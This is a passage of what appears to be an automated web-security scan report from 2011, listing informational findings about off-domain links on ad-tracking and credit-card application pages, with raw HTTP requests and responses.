bkw5=KJhNkWNGWNWxhddq+Eq5Na3CctJWPsykSVJiA2/RLW6gEz1ZhHyWazHSsIFJnN9xGdCHDRXiBJ3eot9ii9KoaYZiYY/KODVXProODnx3TiAbLtdeVXhnRs4edrS2Izd1Zp4jezOPhZ+beKO0nb9C8djfQv0ehccPJ+TxDwcHJbm1iQj6TaYYuqmhzOFGLf0vTJIs+yBLsTlN+dT7fhhA0xI1BJ5hAcqqQ+22QsTgWBa0qk2/8zP3cktGHIRXVCt0MUjfcO9jswxSh4LIZDWLvBjyNABTlQX6v+u/0YJvfRo3k992PTM1b/9qFEqhNuVXo8oyceUhN+t+FQnmjkURtRdM5M2KwQ9IHmQEg4aENUoyBYgMUmLUCe1BTN+Df7qex4pTbkQpE0HO8W6EmVOyC0YKn39f07DgGvzOS1WJWNiOFwb5wwnbcXrbRZyespHTqPdrjY4mAsXe2VFTWrNojsK93HMcnI9UXERWCpCvUkIKOGTT0soL+XAw/LzzoODMBrsRJhNAe4qq8YK+mKDQf5CgW2jXlAWbAnxJ8dayobh7OOXcj5VrhTco+VPAgH8XMLrIFRMnKijhRairZHlkMCUh+/ag6eArPDXkhekAOKFynYawZ8gySP1EwZN3y+oKJzu2X1HBn8hmuslpRbnUBt7BjA010PbfAFu6aYpPRj1pvsW4dP2o7pdHv2mDAhHOAbZIYV323+ZGYVKMJopBjWoAW0zoOi3ZwnZnvUac+BBgahjuXGfRAhSf+VNkCSs6VZK+PNV7ZgOmBVs542Bi9gC3qi0ZtKqNE2SzN1f1mz+0EzPjab5UpaJKB8qR+onBMcwtHVpDK43YM+B67TkVLoHGZO6Ut4wWU5y+BcvUB0sPWEzA5p77d7vRf4Jj+FzXgnNW2Gb2Qi49CTZ1rkbNU+Pb3zZzzr53FK8SosCNF9+EPLhZxImhz+yqdyYDMHdq; bkdc=res

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:51 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=0H6l7dZLk9Sd8JkA; expires=Wed, 14-Dec-2011 11:58:51 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5Na2/DlWDOdeF+ut78SvxCYRM0/0Pgu/xuAiAC0QRwDltRWiHag676xGPbzD/ZZsYuY2Cn6Jdta1IYWAQw4RDO4VuuzJa7aa1H2W8rdlSdjbcf4nC5ff75Ifrf0bd9dYcQUhwJKBOgr/dtp6LourjsY8V4V6/81wctu7MMQufnXnKO7jSXAIfv8AbNsmUKmDUDmQm8ka4m17V4LbS48R/83lerSo7MDrlxwSFLO1+fvnAphIg2U2Na2CvOhbm9rVzpOC04TE5alvf418/4LdlpDyvtSib+fcZgECybSmcj7WFw7737caVbLwVdLfSndrFl0cTN4N6lUZNu5j7wjEUBrUIAkVdcQ5jb86UjKQUITOaLzbF4ZbL2z8pL7KhYYxl4AoI/SfrrL4VKr442Deq/cOt/1igehCgFUBDXrdZQwKu5l8g4sKs4zBT5JG21XPK7ZuFwsJdBF8QlegOlZlzjOyhpC4RBhIyutwLWXNLdqtzUT3UlLQfsFv6X4Tt+rS5DprOXUTw437Zby7tGncZ7udnN8wfyB5N45bO5568NQOXA4BhjYtGPTXmLDK1BKdXVwTXTLLKmkoUdfFHIsiudDwmP2QqhiUMtb4j1Kw0v4SbXE4Mxi4fGqcK7lmew/28mj2fxfTbhrTjRKFPmu7FzIbQHdqqKPllzdTnCrhAFy==; expires=Wed, 14-Dec-2011 11:58:51 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJ0ETtBQ3cqXfzF11/ZBQVsYdV24UGRZeQRsEdl4FAy1WfkCnsVQfcs2lfb1evK8Rvy5yC9VWT13nTxk0meBYhBECfnTsV/a/uhZCgwzWORnxpQf96m3dYIQvEo9DlbXIykAaxoYl1nWG141yceh6N54EQRsGJQVA1U/z95G7Gf1ubeKmYW/iTACWugs0o9wB/d8hUmQrQxKOGSTJXI9+Z7OVj4T/u0QqqyykiEx8IIYqyakjRsLQ/lUQuRe9enFH3A=; expires=Wed, 14-Dec-2011 11:58:51 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJhNkWN/PaWDhddwoIZX1Ewy/83/iMHZcszZwl9u6+aykwkQU9xPHsSSg43YQLMY03iVWEMkG+VxW6un1YxAAiiijPOWVX1VxPaVHvroz282yf662yZKJdfrwK4XpXz5qxJxkz5gI7ECzQ+QRB/q29cMYG7C3AwXWS9xGc2jKHx1GObcT6yXNrJ+G16IkxwdscMqhqqYt7Eg4dJm/u+OGBIEh0c0+CtdtyeE0DOWZdxs/goE71tMit8AlZKTAOO8K2y3aaM6szefB3ZQm0prLmoKncDYajoLHsxHo4Hs1R3K4JAYVGkK/EJ+9kb6m/x2bykc6hwmxWdXg+8YgGHNbQk7Fqj5fKWJoTzFcy94mrC45Y5/kVfsLSM1Ta37/a0e570n0MQlaOnWPIUm9oWTAEKP5992ryEhBxJBDSfGnJgnQs3zE9ek0Jg4bDEVdswq3ZbtgjLBIJtplw6s7vVpj5EMFAFA6h34OLSbm4TL4CsFHqiUGtEBNx7Q3WnVRS5e4C98go9S2erWR88u0cGzz1Cwr7BS/UUR8hemIRJYbMcAWBqhznKLjyzI2Li3URXOWhF0sn5fXeAZrd1XJrL8C/B2XLTnCVHQ2zkvpyhynlBTVLqPSDCnwVBh1qrzt6RXiXLJNHmKDelCY5VEAvLlNF13n+b4JNfbTWhzbkARawBhAI8LyXiQ7/I3/43+7gUN+Y5Rthpt622g7JAPdD6A8a8tGevC4lavEhPNbQ7gNJmx3p4VmjGDmZmDo/PYx7j7mukK3Egbf1aiDg8uKNwYVI6mpMtu6iLGwPPDGYKLxW2Yg+8Ry5IDteur+O4nvqjjX8m2MbVfK5btl9KhDtJnh18ZEVraqxljEagDjxr2xTt/osUdCttuL6A8yLgDlZ5ipBA8soCJiTghpA2kHwRX1NrHcOqFmLX1SEMY5FDztlLIMMJc2G8pQlzyQJaC4RNnEhPggY4pVLdasrLJNdirEUntdeHip1fsRhZXt13q2QIBG6EU; expires=Wed, 14-Dec-2011 11:58:51 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 18-Jun-2011 11:58:51 GMT; path=/; domain=.bluekai.com
BK-Server: 1c6d
Content-Length: 318
Content-Type: text/html

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://ads.bluelithium.com/pixel?adv=23351&code=BKPGGMMSBV2&t=2&rnd=35636724" width=1 height=1 border=0 alt="">
<img src="http://ad.yieldmanager.com/pixel?adv=60652&code=AS12329&t=2&rnd=843979792" width=1 height=1 border=0 alt="">

</div>
...[SNIP]...

15.27. http://tags.bluekai.com/site/2939 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2939

Issue detail

The page was loaded from a URL containing a query string:

http://tags.bluekai.com/site/2939?ret=html&phint=keywords%3DPoints%20Rewards%20Credit%20Cards%2C%20credit%20card%2C%20reward%20credit%20cards%2C%20credit%20card%2C%20Credit%20Cards%2C%20cash%20back&phint=__bk_t%3DPoints%20Rewards%20Credit%20Cards%20-%20CreditCards.com&phint=__bk_k%3DPoints%20Rewards%20Credit%20Cards%2C%20credit%20card%2C%20reward%20credit%20cards%2C%20credit%20card%2C%20Credit%20Cards%2C%20cash%20back&limit=4&r=50781410

The response contains the following links to other domains:

http://ad.yieldmanager.com/pixel?adv=60652&code=AS12330&t=2&rnd=1091258379
http://ads.bluelithium.com/pixel?adv=23351&code=BKPGGMMSBV2&t=2&rnd=1821373188

Request

Response

15.28. https://www.applyonlinenow.com/USCCapp/Ctl/display previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.applyonlinenow.com
Path:	/USCCapp/Ctl/display

Issue detail

The page was loaded from a URL containing a query string:

https://www.applyonlinenow.com/USCCapp/Ctl/display?pageid=disclosure&cp=

The response contains the following link to another domain:

https://wwwa.managerewardsonline.bankofamerica.com/RMSapp/Ctl/entry?pid=mwprwd&mc=PWRRWD&cm_mmc=Cons-CC-_-vanity-_-CC01VN000L_powerrewards-_-NA

Request

GET /USCCapp/Ctl/display?pageid=disclosure&cp= HTTP/1.1
Host: www.applyonlinenow.com
Connection: keep-alive
Referer: https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJCQ&GV10=H|267|K49670&GV1=H%7C143%7Cgan_631529122
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000ldjuhhHR5CpQg0jU5xYLxtN:-1; mbox=check#true#1308312903|session#1308312842615-157926#1308314703

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:16:28 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2
Pragma: no-cache
Cache-Control: no-cache
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 28728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>

<meta content="text/html; charset=ISO-8859-1" http-equiv="Cont
...[SNIP]...
rds Bonus"). The amount of the base cash rewards and Power Rewards Bonus varies based on the amount of points redeemed. Current values for the base cash rewards and Power Rewards Bonus can be found at <a href="https://wwwa.managerewardsonline.bankofamerica.com/RMSapp/Ctl/entry?pid=mwprwd&mc=PWRRWD&cm_mmc=Cons-CC-_-vanity-_-CC01VN000L_powerrewards-_-NA">www.bankofamerica.com/powerrewards</a>
...[SNIP]...

15.29. https://www.citicards.com/cards/acq/Apply.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.citicards.com
Path:	/cards/acq/Apply.do

Issue detail

The page was loaded from a URL containing a query string:

https://www.citicards.com/cards/acq/Apply.do?app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer_631529118&ProspectID=C626E9F2656E4606A21348462D13F6BA

The response contains the following links to other domains:

https://mpsnare.iesnare.com/snare.js
https://seal.verisign.com/splash?form_file=fdf/splash.fdf&type=GOLD&sealid=1&dn=www.citicards.com&lang=en
https://switch.atdmt.com/iaction/dencit_applicationpage_4
https://www.accountonline.com/ACQ/DisplayPage?docId=InitDisclosurePop&sc=4DNZJG213CJ5MDQ95ZW&app=UNSOL&siteId=CB&langId=EN&BUS_TYP_CD=CONSUMER&DOWNSELL_LEVEL=2&BALCON_SC=&B=M&DOWNSELL_BRANDS=M,M,&DownsellSourceCode1=4DNZKFY13CJ5MDQ95ZW&B1=M&DownsellSourceCode2=4DNZLFZ13CJ5MDQ95ZW&B2=M&t=t&uc=ALS
https://www.accountonline.com/ACQ/DisplayTerms?sc=4DNZJG213CJ5MDQ95ZW&app=UNSOL&siteId=CB&langId=EN&BUS_TYP_CD=CONSUMER&DOWNSELL_LEVEL=2&BALCON_SC=&B=M&DOWNSELL_BRANDS=M,M,&DownsellSourceCode1=4DNZKFY13CJ5MDQ95ZW&B1=M&DownsellSourceCode2=4DNZLFZ13CJ5MDQ95ZW&B2=M&t=t&d=&uc=ALS&AMEX_PID_AF_CODE=&AAPID=

Request

Response

HTTP/1.1 200 OK
Server: ""
Date: Fri, 17 Jun 2011 12:17:18 GMT
Content-type: text/html; charset=ISO-8859-1
X-ua-compatible: IE=EmulateIE7
X-ua-compatible: IE=EmulateIE7
Cache-control: no-cache
Pragma: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-control: private
Cache-control: no-store
Cache-control: max-stale=0
Cache-control: must-revalidate
Cache-control: max-age=0
Cache-control: proxy-revalidate
Cache-control: s-max-age=0
Content-language: en-US
Set-cookie: JSESSIONID=0000Ho6b9ssBtDTaeSkMcYAOnV3:gtcardsrmi10crd; Path=/; Secure
Set-cookie: CARDS_LOCALE=en; Path=/
Set-cookie: HSID4DNZJ3000=vRlUqdovLuymEWEwEeCpjj; Path=/; Domain=www.citicards.com; Secure
Set-cookie: siteId=CB; Path=/; Domain=.citicards.com; Secure
Set-cookie: Channel=CONSUMER_UNSOL; Path=/; Domain=www.citicards.com; Secure
Set-cookie: LangId=EN; Path=/; Domain=www.citicards.com; Secure
Set-cookie: DecisionMethod=02; Path=/; Domain=www.citicards.com; Secure
Set-cookie: ProspectID=C626E9F2656E4606A21348462D13F6BA; Path=/; Domain=www.citicards.com; Secure
Set-cookie: ACQHSIDKEY=HSID4DNZJ3000; Path=/; Domain=www.citicards.com; Secure
Vary: accept-encoding
Content-Length: 88320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


...[SNIP]...
<noscript><iframe src="https://switch.atdmt.com/iaction/dencit_applicationpage_4" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...
<p><a class="popup-window" href="https://www.accountonline.com/ACQ/DisplayTerms?sc=4DNZJG213CJ5MDQ95ZW&app=UNSOL&siteId=CB&langId=EN&BUS_TYP_CD=CONSUMER&DOWNSELL_LEVEL=2&BALCON_SC=&B=M&DOWNSELL_BRANDS=M,M,&DownsellSourceCode1=4DNZKFY13CJ5MDQ95ZW&B1=M&DownsellSourceCode2=4DNZLFZ13CJ5MDQ95ZW&B2=M&t=t&d=&uc=ALS&AMEX_PID_AF_CODE=&AAPID=" target="_blank"><sup>
...[SNIP]...
<div class="legalCopy">We can email you the decision on your application, as well as provide your <a class="popup-window" href="https://www.accountonline.com/ACQ/DisplayPage?docId=InitDisclosurePop&sc=4DNZJG213CJ5MDQ95ZW&app=UNSOL&siteId=CB&langId=EN&BUS_TYP_CD=CONSUMER&DOWNSELL_LEVEL=2&BALCON_SC=&B=M&DOWNSELL_BRANDS=M,M,&DownsellSourceCode1=4DNZKFY13CJ5MDQ95ZW&B1=M&DownsellSourceCode2=4DNZLFZ13CJ5MDQ95ZW&B2=M&t=t&uc=ALS">Additional Disclosures</a>
...[SNIP]...
otice through your website. I understand that these electronic copies will replace paper copies. I agree that my computer meets the standards described above. I have read and agree to the terms in the <a class="popup-window" href="https://www.accountonline.com/ACQ/DisplayPage?docId=InitDisclosurePop&sc=4DNZJG213CJ5MDQ95ZW&app=UNSOL&siteId=CB&langId=EN&BUS_TYP_CD=CONSUMER&DOWNSELL_LEVEL=2&BALCON_SC=&B=M&DOWNSELL_BRANDS=M,M,&DownsellSourceCode1=4DNZKFY13CJ5MDQ95ZW&B1=M&DownsellSourceCode2=4DNZLFZ13CJ5MDQ95ZW&B2=M&t=t&uc=ALS">Additional Disclosures</a>
...[SNIP]...
<div class="legalCopy">Please read the <a class="popup-window" href="https://www.accountonline.com/ACQ/DisplayTerms?sc=4DNZJG213CJ5MDQ95ZW&app=UNSOL&siteId=CB&langId=EN&BUS_TYP_CD=CONSUMER&DOWNSELL_LEVEL=2&BALCON_SC=&B=M&DOWNSELL_BRANDS=M,M,&DownsellSourceCode1=4DNZKFY13CJ5MDQ95ZW&B1=M&DownsellSourceCode2=4DNZLFZ13CJ5MDQ95ZW&B2=M&t=t&d=&uc=ALS&AMEX_PID_AF_CODE=&AAPID=">Terms & Conditions</a>
...[SNIP]...
<label for="TERMS_CHECK">I have read and agree to the <a class="popup-window" href="https://www.accountonline.com/ACQ/DisplayTerms?sc=4DNZJG213CJ5MDQ95ZW&app=UNSOL&siteId=CB&langId=EN&BUS_TYP_CD=CONSUMER&DOWNSELL_LEVEL=2&BALCON_SC=&B=M&DOWNSELL_BRANDS=M,M,&DownsellSourceCode1=4DNZKFY13CJ5MDQ95ZW&B1=M&DownsellSourceCode2=4DNZLFZ13CJ5MDQ95ZW&B2=M&t=t&d=&uc=ALS&AMEX_PID_AF_CODE=&AAPID=">Terms & Conditions</a>
...[SNIP]...
</script>
<script type="text/javascript" src="https://mpsnare.iesnare.com/snare.js"></script>
...[SNIP]...
<div id="apply-footer-right">


                                                                                                                       <a ID="cmlink_Verisign_logo" class="noarrow" onclick="javascript:void(window.open('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&type=GOLD&sealid=1&dn=www.citicards.com&lang=en', '', 'width=600,height=450,menubar=no,scrollbars=yes,location=yes'));return false" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&type=GOLD&sealid=1&dn=www.citicards.com&lang=en" target="_blank" title="" ><img ID="cmimage_Verisign_logo" src="/cards/acq/img/logo-verisign.gif" width="94" height="53" border="0" >
...[SNIP]...

15.30. https://www.citicards.com/cards/acq/Apply.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.citicards.com
Path:	/cards/acq/Apply.do

Issue detail

The page was loaded from a URL containing a query string:

https://www.citicards.com/cards/acq/Apply.do?app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631529043&ProspectID=36CEB96C744948E481109575676DCE63

The response contains the following links to other domains:

https://mpsnare.iesnare.com/snare.js
https://seal.verisign.com/splash?form_file=fdf/splash.fdf&type=GOLD&sealid=1&dn=www.citicards.com&lang=en
https://switch.atdmt.com/iaction/dencit_applicationpage_4
https://www.accountonline.com/ACQ/DisplayPage?docId=InitDisclosurePop&sc=4T3ZJR813CJ5MDQ93ZW&app=UNSOL&siteId=CB&langId=EN&BUS_TYP_CD=CONSUMER&DOWNSELL_LEVEL=2&BALCON_SC=&B=M&DOWNSELL_BRANDS=M,M,&DownsellSourceCode1=4T3ZKR413CJ5MDQ93ZW&B1=M&DownsellSourceCode2=4T3ZLR513CJ5MDQ93ZW&B2=M&t=t&uc=AKA
https://www.accountonline.com/ACQ/DisplayTerms?sc=4T3ZJR813CJ5MDQ93ZW&app=UNSOL&siteId=CB&langId=EN&BUS_TYP_CD=CONSUMER&DOWNSELL_LEVEL=2&BALCON_SC=&B=M&DOWNSELL_BRANDS=M,M,&DownsellSourceCode1=4T3ZKR413CJ5MDQ93ZW&B1=M&DownsellSourceCode2=4T3ZLR513CJ5MDQ93ZW&B2=M&t=t&d=&uc=AKA&AMEX_PID_AF_CODE=&AAPID=

Request

POST /cards/acq/Apply.do?app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631529043&ProspectID=36CEB96C744948E481109575676DCE63 HTTP/1.1
Host: www.citicards.com
Connection: keep-alive
Referer: https://online.citibank.com/US/JRS/portal/prefillApps.do?app=UNSOL&sc=4T3ZJR81&m=3CJ5MDQ93ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKA&t=t&link=Consumer_631529043&ProspectID=36CEB96C744948E481109575676DCE63
Content-Length: 0
Cache-Control: max-age=0
Origin: https://online.citibank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20gpv_p7%3D2011_March_ExternlAffiliates_PlatSelect_MC_21monthBTP%7C1308314597198%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; JSESSIONID=0000nDeneI9o8pv-LTRpzUZaZtt:gtcardsrmi10crd; CARDS_LOCALE=en; HSID4T3VJ3000=kTjaTGnJbsaejkJUEjjpcU; siteId=CB; Channel=CONSUMER_UNSOL; LangId=EN; DecisionMethod=02; ProspectID=EAAA394779264223B1D9C404C9AA6734; VISITOR=1308312791632; ACQHSIDKEY=HSID4T3VJ3000

Response

HTTP/1.1 200 OK
Server: ""
Date: Fri, 17 Jun 2011 12:16:08 GMT
Content-type: text/html; charset=ISO-8859-1
X-ua-compatible: IE=EmulateIE7
Cache-control: no-cache
Pragma: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-control: private
Cache-control: no-store
Cache-control: max-stale=0
Cache-control: must-revalidate
Cache-control: max-age=0
Cache-control: proxy-revalidate
Cache-control: s-max-age=0
Content-language: en-US
Set-cookie: CARDS_LOCALE=en; Path=/
Set-cookie: HSID4T3ZJ3000=EpZMbAObtZyn1Gs5jjKpeE; Path=/; Domain=www.citicards.com; Secure
Set-cookie: siteId=CB; Path=/; Domain=.citicards.com; Secure
Set-cookie: Channel=CONSUMER_UNSOL; Path=/; Domain=www.citicards.com; Secure
Set-cookie: LangId=EN; Path=/; Domain=www.citicards.com; Secure
Set-cookie: DecisionMethod=02; Path=/; Domain=www.citicards.com; Secure
Set-cookie: ProspectID=36CEB96C744948E481109575676DCE63; Path=/; Domain=www.citicards.com; Secure
Set-cookie: ACQHSIDKEY=HSID4T3ZJ3000; Path=/; Domain=www.citicards.com; Secure
Vary: accept-encoding
Content-Length: 88403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


...[SNIP]...
<noscript><iframe src="https://switch.atdmt.com/iaction/dencit_applicationpage_4" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...
<p><a class="popup-window" href="https://www.accountonline.com/ACQ/DisplayTerms?sc=4T3ZJR813CJ5MDQ93ZW&app=UNSOL&siteId=CB&langId=EN&BUS_TYP_CD=CONSUMER&DOWNSELL_LEVEL=2&BALCON_SC=&B=M&DOWNSELL_BRANDS=M,M,&DownsellSourceCode1=4T3ZKR413CJ5MDQ93ZW&B1=M&DownsellSourceCode2=4T3ZLR513CJ5MDQ93ZW&B2=M&t=t&d=&uc=AKA&AMEX_PID_AF_CODE=&AAPID=" target="_blank"><sup>
...[SNIP]...
<div class="legalCopy">We can email you the decision on your application, as well as provide your <a class="popup-window" href="https://www.accountonline.com/ACQ/DisplayPage?docId=InitDisclosurePop&sc=4T3ZJR813CJ5MDQ93ZW&app=UNSOL&siteId=CB&langId=EN&BUS_TYP_CD=CONSUMER&DOWNSELL_LEVEL=2&BALCON_SC=&B=M&DOWNSELL_BRANDS=M,M,&DownsellSourceCode1=4T3ZKR413CJ5MDQ93ZW&B1=M&DownsellSourceCode2=4T3ZLR513CJ5MDQ93ZW&B2=M&t=t&uc=AKA">Additional Disclosures</a>
...[SNIP]...
otice through your website. I understand that these electronic copies will replace paper copies. I agree that my computer meets the standards described above. I have read and agree to the terms in the <a class="popup-window" href="https://www.accountonline.com/ACQ/DisplayPage?docId=InitDisclosurePop&sc=4T3ZJR813CJ5MDQ93ZW&app=UNSOL&siteId=CB&langId=EN&BUS_TYP_CD=CONSUMER&DOWNSELL_LEVEL=2&BALCON_SC=&B=M&DOWNSELL_BRANDS=M,M,&DownsellSourceCode1=4T3ZKR413CJ5MDQ93ZW&B1=M&DownsellSourceCode2=4T3ZLR513CJ5MDQ93ZW&B2=M&t=t&uc=AKA">Additional Disclosures</a>
...[SNIP]...
<div class="legalCopy">Please read the <a class="popup-window" href="https://www.accountonline.com/ACQ/DisplayTerms?sc=4T3ZJR813CJ5MDQ93ZW&app=UNSOL&siteId=CB&langId=EN&BUS_TYP_CD=CONSUMER&DOWNSELL_LEVEL=2&BALCON_SC=&B=M&DOWNSELL_BRANDS=M,M,&DownsellSourceCode1=4T3ZKR413CJ5MDQ93ZW&B1=M&DownsellSourceCode2=4T3ZLR513CJ5MDQ93ZW&B2=M&t=t&d=&uc=AKA&AMEX_PID_AF_CODE=&AAPID=">Terms & Conditions</a>
...[SNIP]...
<label for="TERMS_CHECK">I have read and agree to the <a class="popup-window" href="https://www.accountonline.com/ACQ/DisplayTerms?sc=4T3ZJR813CJ5MDQ93ZW&app=UNSOL&siteId=CB&langId=EN&BUS_TYP_CD=CONSUMER&DOWNSELL_LEVEL=2&BALCON_SC=&B=M&DOWNSELL_BRANDS=M,M,&DownsellSourceCode1=4T3ZKR413CJ5MDQ93ZW&B1=M&DownsellSourceCode2=4T3ZLR513CJ5MDQ93ZW&B2=M&t=t&d=&uc=AKA&AMEX_PID_AF_CODE=&AAPID=">Terms & Conditions</a>
...[SNIP]...
</script>
<script type="text/javascript" src="https://mpsnare.iesnare.com/snare.js"></script>
...[SNIP]...
<div id="apply-footer-right">


                                                                                                                       <a ID="cmlink_Verisign_logo" class="noarrow" onclick="javascript:void(window.open('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&type=GOLD&sealid=1&dn=www.citicards.com&lang=en', '', 'width=600,height=450,menubar=no,scrollbars=yes,location=yes'));return false" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&type=GOLD&sealid=1&dn=www.citicards.com&lang=en" target="_blank" title="" ><img ID="cmimage_Verisign_logo" src="/cards/acq/img/logo-verisign.gif" width="94" height="53" border="0" >
...[SNIP]...

15.31. https://www.citicards.com/cards/acq/TimeOut.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.citicards.com
Path:	/cards/acq/TimeOut.do

Issue detail

The page was loaded from a URL containing a query string:

https://www.citicards.com/cards/acq/TimeOut.do?ACQHSIDKEY=HSID4T3ZJ3000

The response contains the following link to another domain:

https://seal.verisign.com/splash?form_file=fdf/splash.fdf&type=GOLD&sealid=1&dn=www.citicards.com&lang=en

Request

Response

HTTP/1.1 200 OK
Server: ""
Date: Fri, 17 Jun 2011 12:43:30 GMT
Content-type: text/html; charset=ISO-8859-1
X-ua-compatible: IE=EmulateIE7
Cache-control: no-cache
Pragma: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-control: private
Cache-control: no-store
Cache-control: max-stale=0
Cache-control: must-revalidate
Cache-control: max-age=0
Cache-control: proxy-revalidate
Cache-control: s-max-age=0
Content-language: en-US
Set-cookie: ACQHSIDKEY=HSID4T3ZJ3000; Path=/; Domain=www.citicards.com; Secure
Vary: accept-encoding
Content-Length: 19071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


...[SNIP]...
<div id="apply-footer-right">


                                                                                                                       <a ID="cmlink_Verisign_logo" class="noarrow" onclick="javascript:void(window.open('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&type=GOLD&sealid=1&dn=www.citicards.com&lang=en', '', 'width=600,height=450,menubar=no,scrollbars=yes,location=yes'));return false" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&type=GOLD&sealid=1&dn=www.citicards.com&lang=en" target="_blank" title="" ><img ID="cmimage_Verisign_logo" src="/cards/acq/img/logo-verisign.gif" width="94" height="53" border="0" >
...[SNIP]...

15.32. https://www.citicards.com/cards/acq/displayECM.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.citicards.com
Path:	/cards/acq/displayECM.do

Issue detail

The page was loaded from a URL containing a query string:

https://www.citicards.com/cards/acq/displayECM.do?screenID=3000&flow=web&siteId=CB&sc=4DNZJG213CJ5MDQ95ZW&B=M&app=UNSOL&m=3CJ5MDQ95ZW&langId=EN&locale=en_US&ECM_SHORTCUT=Y

The response contains the following links to other domains:

https://seal.verisign.com/splash?form_file=fdf/splash.fdf&type=GOLD&sealid=1&dn=www.citicards.com&lang=en
https://switch.atdmt.com/iaction/dencit_applicationpage_4
https://www.accountonline.com/ACQ/DisplayTerms?sc=4DNZJG213CJ5MDQ95ZW&app=UNSOL&siteId=CB&langId=EN&BUS_TYP_CD=CONSUMER&DOWNSELL_LEVEL=2&BALCON_SC=&B=M&DOWNSELL_BRANDS=M,M,&DownsellSourceCode1=4DNZKFY13CJ5MDQ95ZW&B1=M&DownsellSourceCode2=4DNZLFZ13CJ5MDQ95ZW&B2=M&t=t&d=&uc=ALS&AMEX_PID_AF_CODE=&AAPID=

Request

GET /cards/acq/displayECM.do?screenID=3000&flow=web&siteId=CB&sc=4DNZJG213CJ5MDQ95ZW&B=M&app=UNSOL&m=3CJ5MDQ95ZW&langId=EN&locale=en_US&ECM_SHORTCUT=Y HTTP/1.1
Host: www.citicards.com
Connection: keep-alive
Referer: https://www.citicards.com/cards/acq/Apply.do?app=UNSOL&sc=4DNZJG21&m=3CJ5MDQ95ZW&langId=EN&siteId=CB&B=M&screenID=3000&uc=ALS&t=t&link=Consumer_631529118&ProspectID=C626E9F2656E4606A21348462D13F6BA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
